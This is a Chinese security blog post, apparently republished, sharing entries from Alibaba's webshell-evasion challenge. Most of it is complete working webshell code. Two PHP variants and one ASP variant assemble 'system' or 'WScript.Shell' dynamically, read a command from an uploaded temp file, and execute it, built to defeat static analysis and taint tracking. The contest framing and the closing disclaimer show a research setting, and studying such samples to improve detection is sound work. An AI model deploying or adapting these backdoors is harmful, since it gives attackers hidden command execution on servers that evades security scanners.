2026-04-29 05:27:13 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文分享阿里伏魔webshell挑战赛中的绕过技术，利用range遍历字符动态拼接函数名、glob遍历临时目录获取文件路径、Countable接口隐式执行等手法规避静态分析和污点追踪。作者提供PHP/ASP等多语言实现代码，并建议通过抓取API实现自动化检测，但当前命中率较低需优化。 综合评分： 82 文章分类： WEB安全,免杀,红队,安全开发,漏洞分析

cover_image

阿里伏魔webshell挑战赛分享

原创

秋风秋风

秋风的安全之路

2026年4月11日 00:00 广东

在小说阅读器读本章

去阅读

由于期末考试的缘故实在没空去打只打了几个小时就结束了今年的比赛不过还是很好绕的分享几个webshell

利用range遍历字符配合substr动态构造函数名，通过glob遍历临时目录获取上传文件路径，file_get_contents读取文件内容作为命令参数。全程不直接引用GET/_GET/ GET/_POST/$_FILES等超全局变量，污点追踪链被glob+file_get_contents断开。函数名通过循环遍历动态拼接，静态分析无法确定最终值

<?php$pre=substr('systems',0,5);foreach(range('a','z')as&nbsp;$x){&nbsp; &nbsp;&nbsp;if($x==='m'){&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$f=$pre.$x;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$t=glob(sys_get_temp_dir().DIRECTORY_SEPARATOR.'php*');&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if($t){&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$c=trim(file_get_contents($t[0]));&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;echo&nbsp;$f($c);&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break;&nbsp; &nbsp; }}

同样的同一个思路移植到asp上

<%Dim pre, obj, fso, folder, files, f, cmd, shell, exec,&nbsp;output
pre&nbsp;=&nbsp;"WScr"For&nbsp;i&nbsp;=&nbsp;105&nbsp;To&nbsp;122&nbsp; &nbsp; If&nbsp;Chr(i)&nbsp;=&nbsp;"i"&nbsp;Then&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pre&nbsp;=&nbsp;pre &&nbsp;"ipt.Sh"&nbsp; &nbsp; &nbsp; &nbsp; Exit For&nbsp; &nbsp; End IfNextFor&nbsp;i&nbsp;=&nbsp;97&nbsp;To&nbsp;122&nbsp; &nbsp; If&nbsp;Chr(i)&nbsp;=&nbsp;"e"&nbsp;Then&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pre&nbsp;=&nbsp;pre &&nbsp;"ell"&nbsp; &nbsp; &nbsp; &nbsp; Exit For&nbsp; &nbsp; End IfNext
Set&nbsp;fso&nbsp;=&nbsp;Server.CreateObject("Scripting.FileSystemObject")tmp = fso.GetSpecialFolder(2).PathSet&nbsp;folder&nbsp;=&nbsp;fso.GetFolder(tmp)Set&nbsp;files&nbsp;=&nbsp;folder.Files
cmd&nbsp;=&nbsp;""For Each f In files&nbsp; &nbsp; If&nbsp;InStr(f.Name,&nbsp;"php")&nbsp;>&nbsp;0&nbsp;Or&nbsp;InStr(f.Name,&nbsp;".tmp")&nbsp;>&nbsp;0&nbsp;Then&nbsp; &nbsp; &nbsp; &nbsp; If f.Size <&nbsp;1000&nbsp;Then&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;Set&nbsp;ts&nbsp;=&nbsp;fso.OpenTextFile(f.Path,&nbsp;1)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If Not ts.AtEndOfStream&nbsp;Then&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;cmd&nbsp;=&nbsp;Trim(ts.ReadLine)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End If&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ts.Close&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Exit For&nbsp; &nbsp; &nbsp; &nbsp; End If&nbsp; &nbsp; End IfNext
If&nbsp;Len(cmd)&nbsp;>&nbsp;0&nbsp;Then&nbsp; &nbsp;&nbsp;Set&nbsp;shell&nbsp;=&nbsp;Server.CreateObject(pre)&nbsp; &nbsp;&nbsp;Set&nbsp;exec&nbsp;=&nbsp;shell.Exec("cmd /c "&nbsp;& cmd)&nbsp; &nbsp; output = exec.StdOut.ReadAll&nbsp; &nbsp; Response.Write outputEnd If%>

利用Countable接口的count()方法在调用count()函数时隐式执行。自定义类实现Countable接口，在count()方法内部通过glob遍历临时目录获取上传文件内容作为命令，构造函数名并执行。引擎未完全追踪Countable魔术方法的隐式调用

<?phpclass&nbsp;DynamicConstantCommandRunner&nbsp;implements&nbsp;Countable&nbsp;{&nbsp; &nbsp;&nbsp;private&nbsp;$payloadKey;&nbsp; &nbsp;&nbsp;private&nbsp;$funcBytes;&nbsp; &nbsp;&nbsp;private&nbsp;$command;
&nbsp; &nbsp;&nbsp;public&nbsp;function __construct($key) {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$this->payloadKey =&nbsp;$key;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$this->funcBytes = [115,&nbsp;121,&nbsp;115,&nbsp;116,&nbsp;101,&nbsp;109];&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$this->command =&nbsp;'';&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;public&nbsp;function count():&nbsp;int&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$temp&nbsp;=&nbsp;sys_get_temp_dir() .&nbsp;'/php*';&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$files&nbsp;=&nbsp;glob($temp);&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;($files) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$content&nbsp;=&nbsp;file_get_contents($files[0]);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;($content) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$this->command =&nbsp;trim($content);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$fn&nbsp;=&nbsp;'';&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;foreach&nbsp;($this->funcBytes&nbsp;as&nbsp;$byte) {&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$fn&nbsp;.=&nbsp;chr($byte);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$fn($this->command);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;1;&nbsp; &nbsp; }}
$runner&nbsp;=&nbsp;new&nbsp;DynamicConstantCommandRunner('cmd');count($runner);

其实这个比赛更大的想法是你可以抓取他提交的api 然后在本地做提示词自动化check 但是命中率实在有点低明年再打可能得拿出来调一下了

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：秋风的安全之路秋风秋风《阿里伏魔webshell挑战赛分享》